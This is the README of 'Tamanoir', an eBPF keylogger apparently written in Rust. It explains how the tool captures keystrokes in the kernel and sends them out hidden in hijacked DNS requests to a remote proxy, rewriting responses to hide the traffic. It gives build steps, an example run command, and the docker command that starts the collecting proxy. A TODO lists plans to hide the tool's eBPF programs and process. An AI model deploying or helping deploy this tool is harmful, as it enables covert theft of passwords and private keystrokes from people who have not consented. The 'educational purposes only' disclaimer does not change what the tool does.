Tamanoir
A KeyLogger using eBPF 🐝
A large anteater of Central and South America, Myrmecophaga tridactyla
💡Overview
- Capture keystrokes and store them in a queue in the kernel.
- Intercept DNS requests and inject the captured keystroes in the DNS payload then redirect the request designated remote server acting as a DNS proxy.
- On the remote server, extract the keys from the DNS payload and send a valid DNS response.
- Intercept the response and modify its source address so the initial request will complete successfully.
🚀 Setup
You need a Linux based OS.
⚒️ Build from source
To build from source, make sure you have:
- bpf-linker installed.
- Rust installed with
nightlytoolchain.
1. Build ebpf program
cd tamanoir-ebpf
cargo build --release
2. Build user space program
This will produce an executable file at target/release/tamanoir that you can copy to a directory in your $PATH
📥 Binary release
You can download the pre-built binaries from the release page
🪄 Usage
Tamanoir
RUST_LOG=info sudo -E tamanoir \
--proxy-ip <DNS proxy IP> \
--hijack-ip <locally configured DNS server IP> \
--layout <keyboard layout> \
--iface <network interface name>
for example:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.75 \
--hijack-ip 8.8.8.8 \
--layout 0 \
--iface wlan0
Currenly, there are two supported keyboard layouts:
0 : qwerty (us)
1 : azerty (fr)
DNS Proxy
On a remote host, make sure you have docker installed.
1. Build proxy image
cd proxy
docker build -t proxy .
2. Run proxy
Note
Make sure port 53 is available
docker run --rm -it -p 53:53/udp -e PAYLOAD_LEN=8 proxy
🛠️TODO
- Automatic discovery of the configured local dns server
- Automatic discovery of the keyboard layout
- Rewrite the DNS proxy in Rust
- Make
Tamanoirstealth (hide used ebpf maps and programs, process pid ...)
⚠️ Disclaimer
Tamanoir is developed for educational purposes only
✍️ Authors
⚖️ License
GPLv3